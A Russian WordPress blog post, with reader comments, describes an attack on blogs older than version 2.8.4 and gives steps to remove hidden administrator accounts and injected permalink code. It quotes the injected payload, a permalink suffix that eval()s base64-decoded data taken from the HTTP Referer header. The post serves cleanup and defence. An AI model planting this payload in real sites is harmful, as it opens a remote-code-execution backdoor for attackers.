n-wp.ru — блог о WordPress

Атака на блоги WordPress

Вчера произошла атака на блоги WordPress старых версий. Я узнал об этом от знакомого, который обратился ко мне, описав ситуацию — не работают ссылки на страницы. Обобщив информацию, я получил такую картину:

  1. атаке подверглись блоги с WordPress ниже 2.8.4
  2. после атаки к прямой ссылке на посты добавилась приставка %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  3. среди администраторов блога появились совершенно «левые», хотя напрямую это не видно

Вылечить свой блог можно за четыре шага:

1. Зайдите в панель администрирования, в раздел пользователей. Найдите среди них последнего зарегистрировавшегося.

2. У этого пользователя скопируйте ссылку, которая скрывается под пунктом «Редактирование/Изменить/Edit» и вставьте ее в браузер.

3. Увеличьте номер пользователя на единицу и зайдите на страницу редактирования профиля — откроется профиль скрытого администратора, у которого вместо имени какой-то код. Удалите имя и сохраните — профиль появится среди обычных пользователей. После этого можете его удалять обычным способом.

4. Зайдите в настройки постоянных ссылок (Параметры → Постоянные ссылки) и удалите код, который был добавлен к виде ваших ссылок.

Скриншоты привести не могу, так как мои блоги не подверглись этой атаке (или успешно от нее отбились). А теперь главный вопрос: почему вы не обновляетесь вовремя? Чтобы делать это автоматически, прочитайте пост Автоматическое обновление WordPress.

4 комментария

  • Да, атака была. Но вот левых пользователей с админ правами я не видел. Так как у меня зарегистрированные пользователи практически все- авторы спам комментариев то тупо удалил всех. Поправил ЧПУ и обновил блог. :) Жаль, что скриншотов не сделал я :( не догадался…

  • Последний зарегистрировавшийся есть? Нужно проверить его, как описано выше. Потому что скрытого администратора не видно обычным путем.

  • Был :) я ж говорю- я всех подчистую убрал. Ни одного комментария от зарегистрированных, кроме тебя (да и то месяц назад наверное ;)) И Индигоблэка не было. Только спамили почти все. Удалил. Но у всех прописаны права «пользователь» были. Я смотрел.. Я думаю может все-таки права на htacces виной?

  • Спасибо огромное за методику. Обнаружил у себя 10 (!!!!!) скрытых юзеров-админов… заметил неделью назад, что ЧПУ выдает какую-то хрень… пошел все поправил руками, через день — снова хрень… а сегодня прочитал про эту напасть и сразу понял, что это про меня… Спасибо еще раз.